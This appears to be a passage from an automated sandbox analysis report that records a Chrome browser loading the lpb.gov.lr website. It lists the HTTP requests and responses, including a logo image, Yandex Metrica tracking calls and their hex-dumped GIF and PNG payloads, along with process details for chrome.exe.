                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:54:56 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        103192.168.2.74994469.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:56 UTC495OUTGET /wp-content/uploads/2024/01/logo-1-150x150.png HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288; _ym_isad=2
                                                                                                                        2025-01-10 13:54:56 UTC363INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:56 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 17 Jan 2024 14:51:58 GMT
                                                                                                                        ETag: "aa07-60f25638a54e0"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 43527
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:56 GMT
                                                                                                                        Vary: User-Agent,Accept-Encoding
                                                                                                                        Content-Type: image/png
                                                                                                                        2025-01-10 13:54:56 UTC7829INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 96 00 00 00 96 08 06 00 00 00 3c 01 71 e2 00 00 80 00 49 44 41 54 78 da ec fd 77 94 a5 d9 55 de 8f 7f ce 39 6f bc b1 72 55 57 77 57 e7 30 dd 3d d3 61 72 94 34 a3 51 06 25 44 92 48 06 44 ce f0 c5 60 03 36 06 fc b5 bf 06 63 6c 82 c1 3f 61 19 99 28 04 12 08 a1 9c 26 cf f4 c4 9e e9 9c bb ba ba 2b d7 8d 6f 38 e1 f7 c7 b9 dd 12 18 09 0c 38 60 eb ae d5 6b d6 d4 aa 7b eb bd ef dd f7 ec bd 9f fd 3c cf 86 2f 3d be f4 f8 d2 e3 4b 8f 2f 3d be f4 f8 d2 e3 4b 8f 2f 3d fe be 1f e2 ff f6 1b 70 c3 b7 0b 11 55 21 95 15 91 d9 52 46 a3 3a 90 46 09 db 4a 84 50 08 2b 4b 81 30 0a 21 84 74 0e 23 70 8a c8 08 a3 9c 28 85 33 81 71 41 a4 b1 85 d4 b6 50 26 13 99 2b 4b cd d1 5f 72 ee 4b 81 f5 7f d1 e3 96 1f 8e a5 4a c3 c0 14 36
                                                                                                                        Data Ascii: PNGIHDR<qIDATxwU9orUWwW0=ar4Q%DHD`6cl?a(&+o88`k{</=K/=K/=pU!RF:FJP+K0!t#p(3qAP&+K_rKJ6
                                                                                                                        2025-01-10 13:54:56 UTC8000INData Raw: e2 0b 60 6b 90 42 60 81 5e 99 63 ac c5 38 8b 92 8a cc 14 58 2c 79 59 7a 75 33 82 76 99 23 80 7e 59 10 86 21 da 59 4a ab 31 e0 bb d6 41 ed 03 90 eb 12 15 48 04 d0 d5 39 95 a8 c9 78 7d 0b fb 37 dc c7 ce c9 5b e9 da 92 e3 f3 4f f2 cc d9 3f 67 a5 7d 11 19 d7 19 a9 4c 60 1c fe 9a 9c a5 55 64 d7 4f 7c 15 04 f4 cb 1c 63 0d da 1a 90 be 6e ec ea 3e 95 70 88 28 1c 45 05 0a 87 f4 1c 2f e7 30 38 02 a1 28 9c a1 b0 86 d2 14 a0 24 12 41 5f 17 e4 ba cd c7 4f fc 1e 65 d1 62 b4 be 85 be c9 18 4e 27 b1 2a 4a 4f 2d 1e de 6a c9 0f 0f ed 73 57 e6 9f f8 db 3b e6 fc 9d 02 6b e6 81 b0 16 0f a9 1f bd 71 f3 cb de f6 d6 03 3f ac 4a 2b 71 4a b0 d6 5f a3 34 7d 8c 83 cc 1a 4a 67 28 8c 01 07 1d 93 53 94 05 a5 b1 e4 ce a7 b6 d2 19 b4 85 8d 23 37 b2 67 ea 2e a4 8a fd 07 6e 34 59 99 83 80
                                                                                                                        Data Ascii: `kB`^c8X,yYzu3v#~Y!YJ1AH9x}7[O?g}L`UdO|cn>p(E/08($A_OebN'*JO-jsW;kq?J+qJ_4}Jg(S#7g.n4Y
                                                                                                                        2025-01-10 13:54:56 UTC8000INData Raw: 99 82 18 85 af b3 15 bd b2 1c ec 40 84 ed 13 77 12 cb df e0 33 67 3f c0 c8 f0 8d 54 83 14 e3 1c a2 94 d7 2f c5 94 1a 01 b4 f3 be bf e7 41 48 69 35 c2 49 a2 68 1d 5f 7d eb 3f a5 dd 5f 62 35 5b 63 28 19 22 52 4d 2a 71 85 56 9e 53 e0 b9 6c ed b2 4f 35 c8 31 83 d9 e9 68 75 17 71 5c db 9f 85 ad f5 b7 fc a3 e0 d4 53 7f 69 df f5 7f 13 58 87 be 65 54 b8 a0 b7 af 51 1d 3d b0 75 7c 0f 91 90 68 0c 47 e6 1e a2 9d af 20 ac e5 6a ff 3c 0b 17 2f 82 b0 24 f1 30 27 67 1f a3 2e 6b 8c d5 b6 11 98 90 54 44 20 24 0a 87 11 be 36 8a 45 80 1b a4 9b 1e 05 01 d2 3b b2 98 9c d3 8b 87 19 4a 26 d9 3a 7e 80 48 0c 5c 55 9c 1f 00 07 42 fa 93 47 0a 32 6d 48 44 40 2c 83 c1 50 59 50 5a 4b a8 24 0a 58 5a 5e e2 c8 91 a7 39 79 ec 05 16 56 17 51 b1 c1 52 e0 9c 21 a8 08 1a 63 4d da 65 8f a2 28
                                                                                                                        Data Ascii: @w3g?T/AHi5Ih_}?_b5[c("RM*qVSlO51huq\SiXeTQ=u|hG j</$0'g.kTD $6E;J&:~H\UBG2mHD@,PYPZK$XZ^9yVQR!cMe(
                                                                                                                        2025-01-10 13:54:56 UTC8000INData Raw: b2 4a 2d f2 5e f3 f5 50 0c 84 26 8e 45 34 c6 14 39 b8 e2 0b 77 85 b9 d2 06 d7 5e ec cd b3 92 77 91 3a a3 34 5e bf b7 d2 bd c4 72 67 f6 7a ad d0 ca 97 f9 1c 4c 07 57 ba 57 98 ef af 50 b3 0d 3a f4 3d 70 56 fa 9d 7b c2 f8 25 d7 ce b9 eb 0b bf db 65 46 89 23 4a 26 d9 3c 71 23 2f 5e 79 82 b3 6b 17 49 a3 51 af 44 d6 9a b0 cc fc 3e 68 e5 89 76 c6 f9 e7 f5 8a 9c 5e 90 f9 fd ca d2 9f 4d a5 b5 c4 91 e2 9e 5b 5e c9 c7 5f f8 03 ea 7b 9a 04 72 50 70 b9 6b 1b de f9 3c 74 dc 91 56 22 6e 7d fd 0e f4 cb fc 9d 98 da 94 a2 6d c6 d8 74 c8 3d 6f de cb c7 ff f3 d3 5c 7a f2 2a 02 49 54 51 ec 7e c5 0c 07 5e b1 85 38 55 84 d5 cf 63 2a b8 bf 1a 95 ff 7c 39 b4 bb ce c1 1a 80 f8 36 a6 19 6c 65 6a 62 37 57 3b 6b 84 91 2f b8 65 29 e8 17 39 6b 99 c4 0a 4b 1c 94 9e df 26 3c 30 2c 95 22
                                                                                                                        Data Ascii: J-^P&E49w^w:4^rgzLWWP:=pV{%eF#J&<q#/^ykIQD>hv^M[^_{rPpk<tV"n}mt=o\z*ITQ~^8Uc*|96lejb7W;k/e)9kK&<0,"
                                                                                                                        2025-01-10 13:54:57 UTC8000INData Raw: c3 41 c9 98 24 92 53 4b 49 85 84 2a 22 d2 2a 61 7b c6 f4 95 47 b0 85 43 5d 6e 1a 13 eb e7 72 74 e8 10 eb 0f 3e ce ce ae b5 e4 52 95 d4 66 c6 32 12 1a 86 54 18 2a 10 16 5a 2b 06 c3 12 3a 56 26 3a 25 d6 84 28 8a 41 19 5f 45 44 ca 00 77 47 54 80 52 8a 72 18 8c b2 0d 46 ca c6 67 59 08 7d d3 a2 88 cd 40 3d d6 3a 69 18 eb 51 00 47 59 85 58 98 53 db 48 60 18 16 81 56 89 ec 38 a0 14 06 28 15 a3 44 cc a1 de 4d fc 7a e3 4d 3c b1 fd 5e aa b3 cd 5c 75 c2 27 58 36 ed f5 94 95 19 ba 87 91 31 82 14 42 3f c1 3f 45 a3 aa d4 91 d0 27 56 31 85 28 c0 16 e6 cd 5c 08 cc bf 21 4a 56 84 b2 0a 29 a9 90 20 0c cc 5e 4b 9b 58 3e a9 a1 ad b3 83 7b 7e 70 07 3d 5d 5d cc 99 3f 8f 5c 65 9e 23 fb 0f b1 79 c3 46 56 2e 5f c9 8a a7 96 b3 73 fb 76 a6 cf 9e 4d b6 22 c3 83 5b 6e 8b b7 1e 7e f1
                                                                                                                        Data Ascii: A$SKI*"*a{GC]nrt>Rf2T*Z+:V&:%(A_EDwGTRrFgY}@=:iQGYXSH`V8(DMzM<^\u'X61B??E'V1(\!JV) ^KX>{~p=]]?\e#yFV._svM"[n~
                                                                                                                        2025-01-10 13:54:57 UTC3698INData Raw: db db e8 ed ed 65 eb d6 ad 2c 58 bc 88 1b ae bf 9e 77 be f7 3d 34 8d 6d a6 3e 5d 81 23 6d f2 5e 06 a9 a1 63 60 07 bf 5a fb 95 e0 85 5d 0f 3d 51 1c 2a 7f 2c 18 10 af 6c bc b9 a8 fe bb 9e f7 7f 5b 61 01 74 6c 28 d1 b8 d4 1e b6 d0 6b fa 0a 1d a5 7d bd 1b e6 6a a9 73 d5 b9 89 08 6c 7c 1d 31 9c 98 03 4a ca 6c 01 c6 4e 99 4c a6 22 c7 be bd fb 68 59 b7 91 ce b6 76 2a 2a f2 bc ed 5d d7 b2 f0 e4 13 f9 e9 8f 7e 4c 57 67 27 d9 6c 8e cd 9b 37 f1 f8 a3 8f d1 d7 d3 cb fc c5 8b 78 db 7b df c5 86 f5 eb 79 e9 f9 17 98 30 65 32 ff 76 ed 35 a4 33 06 50 e6 87 21 b7 de 74 0b 37 7f e5 eb ec 39 74 80 93 96 9d 81 14 82 0d 1b 37 f2 f8 c3 8f b0 7c f9 72 0e ec db 6f 94 ad b9 14 4a 68 46 fc 22 48 49 29 32 a7 bd c3 87 0e f3 e8 83 7f e0 f7 bf f9 2d 0f 3f f2 08 7b 76 ef c1 c9 a4 49 e7
                                                                                                                        Data Ascii: e,Xw=4m>]#m^c`Z]=Q*,l[atl(k}jsl|1JlNL"hYv**]~LWg'l7x{y0e2v53P!t79t7|roJhF"HI)2-?{vI


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        104192.168.2.74996587.250.251.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:59 UTC1622OUTGET /clmap/99162160?page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&pointer-click=rn%3A964157177%3Ax%3A39789%3Ay%3A30426%3At%3A97%3Ap%3A%3FAAA3%3AX%3A519%3AY%3A451&browser-info=u%3A1736517288271535202%3Av%3A1551%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Arqnl%3A1%3Ast%3A1736517298&t=gdpr(14)ti(1) HTTP/1.1
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Origin: https://www.lpb.gov.lr
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; yashr=6034268381736517292; yandexuid=8715430261736517288; yuidss=8715430261736517288; i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; sync_cookie_ok=synced; sync_cookie_csrf_secondary=867164232fake; sync_cookie_ok_secondary=synced; yp=1736603696.yu.8715430261736517288; ymex=1739109296.oyu.8715430261736517288#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291
                                                                                                                        2025-01-10 13:55:00 UTC467INHTTP/1.1 200 Ok
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Origin: https://www.lpb.gov.lr
                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 43
                                                                                                                        Content-Type: image/gif
                                                                                                                        Date: Fri, 10 Jan 2025 13:55:00 GMT
                                                                                                                        Expires: Fri, 10-Jan-2025 13:55:00 GMT
                                                                                                                        Last-Modified: Fri, 10-Jan-2025 13:55:00 GMT
                                                                                                                        Pragma: no-cache
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:55:00 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        105192.168.2.74996687.250.251.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:59 UTC2597OUTPOST /watch/99162160/1?page-url=goal%3A%2F%2Fwww.lpb.gov.lr%2FClick&page-ref=https%3A%2F%2Fwww.lpb.gov.lr%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.134%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.134%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.134%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&hittoken=1736517291_cee59135203049223fa15c9996fec59728bb28076bcf89908843ed89232c137b&browser-info=ar%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A3%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A1%3Als%3A632894401814%3Ahid%3A756856224%3Az%3A-300%3Ai%3A20250110085457%3Aet%3A1736517298%3Ac%3A1%3Arn%3A260329270%3Arqn%3A2%3Au%3A1736517288271535202%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Awv%3A2%3Ads%3A%2C%2C%2C%2C%2C%2C%2C5854%2C19%2C14915%2C14915%2C3%2C10062%3Aco%3A0%3Acpf%3A1%3Aeu%3A2%3Ans%3A1736517279176%3Aadb%3A2%3Arqnl%3A1%3Ast% [TRUNCATED]
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        Content-Length: 0
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Origin: https://www.lpb.gov.lr
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; yashr=6034268381736517292; yandexuid=8715430261736517288; yuidss=8715430261736517288; i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; sync_cookie_ok=synced; sync_cookie_csrf_secondary=867164232fake; sync_cookie_ok_secondary=synced; yp=1736603696.yu.8715430261736517288; ymex=1739109296.oyu.8715430261736517288#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291
                                                                                                                        2025-01-10 13:55:00 UTC757INHTTP/1.1 200 Ok
                                                                                                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Origin: https://www.lpb.gov.lr
                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 43
                                                                                                                        Content-Type: image/gif
                                                                                                                        Date: Fri, 10 Jan 2025 13:55:00 GMT
                                                                                                                        Expires: Fri, 10-Jan-2025 13:55:00 GMT
                                                                                                                        Last-Modified: Fri, 10-Jan-2025 13:55:00 GMT
                                                                                                                        Pragma: no-cache
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:55:00 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        106192.168.2.74997177.88.21.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:55:00 UTC1466OUTGET /clmap/99162160?page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&pointer-click=rn%3A964157177%3Ax%3A39789%3Ay%3A30426%3At%3A97%3Ap%3A%3FAAA3%3AX%3A519%3AY%3A451&browser-info=u%3A1736517288271535202%3Av%3A1551%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Arqnl%3A1%3Ast%3A1736517298&t=gdpr(14)ti(1) HTTP/1.1
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; yashr=6034268381736517292; yandexuid=8715430261736517288; yuidss=8715430261736517288; i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; sync_cookie_ok=synced; sync_cookie_csrf_secondary=867164232fake; _yasc=3uF/2lFvypDsKrJZlPOphP3xGb+rc43dar45OX9iptQ5StXgxHuBuRbJulbOjpTO96tV; sync_cookie_ok_secondary=synced; yp=1736603696.yu.8715430261736517288; ymex=1739109296.oyu.8715430261736517288#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291
                                                                                                                        2025-01-10 13:55:01 UTC374INHTTP/1.1 200 Ok
                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 43
                                                                                                                        Content-Type: image/gif
                                                                                                                        Date: Fri, 10 Jan 2025 13:55:01 GMT
                                                                                                                        Expires: Fri, 10-Jan-2025 13:55:01 GMT
                                                                                                                        Last-Modified: Fri, 10-Jan-2025 13:55:01 GMT
                                                                                                                        Pragma: no-cache
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:55:01 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        107192.168.2.75005187.250.251.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:55:15 UTC2112OUTPOST /watch/99162160/1?page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&charset=utf-8&hittoken=1736517291_cee59135203049223fa15c9996fec59728bb28076bcf89908843ed89232c137b&browser-info=nb%3A1%3Acl%3A4059%3Aar%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A1%3Als%3A632894401814%3Ahid%3A756856224%3Az%3A-300%3Ai%3A20250110085513%3Aet%3A1736517314%3Ac%3A1%3Arn%3A428194297%3Arqn%3A3%3Au%3A1736517288271535202%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Awv%3A2%3Aco%3A0%3Acpf%3A1%3Aeu%3A2%3Ans%3A1736517279176%3Aadb%3A2%3Arqnl%3A1%3Ast%3A1736517314&t=gdpr(14)mc(g-1)clc(1-519-451)rqnt(3)aw(1)rcm(1)cdl(na)eco(42009088)dss(2)fid(100)ti(0)&force-urlencoded=1&site-info=%7B%22__ym%22%3A%7B%22ct%22%3A%5B%5D%7D%7D HTTP/1.1
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        Content-Length: 0
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Origin: https://www.lpb.gov.lr
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; yashr=6034268381736517292; yandexuid=8715430261736517288; yuidss=8715430261736517288; i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; sync_cookie_ok=synced; sync_cookie_csrf_secondary=867164232fake; sync_cookie_ok_secondary=synced; yp=1736603696.yu.8715430261736517288; ymex=1739109296.oyu.8715430261736517288#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291
                                                                                                                        2025-01-10 13:55:16 UTC757INHTTP/1.1 200 Ok
                                                                                                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Origin: https://www.lpb.gov.lr
                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 43
                                                                                                                        Content-Type: image/gif
                                                                                                                        Date: Fri, 10 Jan 2025 13:55:15 GMT
                                                                                                                        Expires: Fri, 10-Jan-2025 13:55:15 GMT
                                                                                                                        Last-Modified: Fri, 10-Jan-2025 13:55:15 GMT
                                                                                                                        Pragma: no-cache
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:55:16 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Target ID:0
                                                                                                                        Start time:08:54:28
                                                                                                                        Start date:10/01/2025
                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                        Imagebase:0x7ff6c4390000
                                                                                                                        File size:3'242'272 bytes
                                                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        Target ID:4
                                                                                                                        Start time:08:54:32
                                                                                                                        Start date:10/01/2025
                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        Wow64 process (32bit):false
